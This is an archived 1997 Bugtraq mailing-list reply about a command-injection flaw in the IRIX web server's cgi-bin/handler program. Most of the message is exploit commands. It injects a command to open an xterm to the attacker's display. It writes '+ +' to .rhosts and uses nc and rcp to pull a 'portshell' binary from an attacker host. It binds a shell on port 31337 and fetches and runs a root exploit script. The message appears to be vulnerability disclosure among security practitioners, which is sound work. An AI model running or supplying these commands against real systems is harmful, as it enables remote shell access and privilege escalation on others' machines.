Bugtraq mailing list archives
Re: CPSR 7: IRIX WWW Server
From: aaronb () j51 com (Aaron Bornstein)
Date: Thu, 24 Jul 1997 12:59:54 -0400
On Thu, 24 Jul 1997, Thomas Walter wrote: [snip]
enemy% telnet victim 80 Trying 1.2.3.4... Connected to victim. Escape character is '^]'. GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download UX:sh (sh): ERROR: Connection closed by foreign host. enemy% And voila! - What else do you want? Any other programs to start? Just try...
Keep in mind that it isn't necessary to get everything done in one command. A string of two or three commands might sometimes be necessary to get things moving. For example: enemy% whoami evil_cracker enemy% echo + + > .rhosts enemy% nc victim.com 80 GET /cgi-bin/handler/;/usr/bsd/rcp evil_cracker () enemy com:portshell /tmp|?data=Download enemy% nc victim.com 80 GET /cgi-bin/handler/;/tmp/portshell 31337|?data=Download enemy% nc victim.com 31337 % whoami nobody % rcp evil_cracker () enemy com:irix_root_bug_of_the_week.sh \ ./irbotw.sh ; ./irbotw.sh # [... or whatever ...] "portshell" being a program that bound itself to a TCP port and executed a shell upon receiving a connection. Boom, shell access obtained under whatever uid httpd is running as. Or, one could even create a dummy inetd.conf and run their own copy of inetd. The possiblities are virtually limitless. --Aaron - -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- - Never let your schooling interfere with your education
Current thread:
- Re: CPSR 7: IRIX WWW Server Thomas Walter (Jul 24)
- Re: CPSR 7: IRIX WWW Server Aaron Bornstein (Jul 24)
- Security hole in mgetty+sendfax Gert Doering (Jul 24)
- BIND Nuking Aveek Datta (Jul 24)
- Re: BIND Nuking Thomas H. Ptacek (Jul 29)
- ANNOUNCE: inn-1.5.1sec (fwd) Christopher Samuel (Jul 30)
- Re: Security hole in mgetty+sendfax Gert Doering (Jul 25)
- BIND Nuking Nicolas Dubee (Jul 25)
- Re: your mail Ariel Biener (Jul 25)
- Re: request-route Zoltan Hidvegi (Jul 28)
- Re: request-route Eric Bennett (Jul 29)
- Re: request-route John Macdonald (Jul 29)
- BIND Nuking Aveek Datta (Jul 24)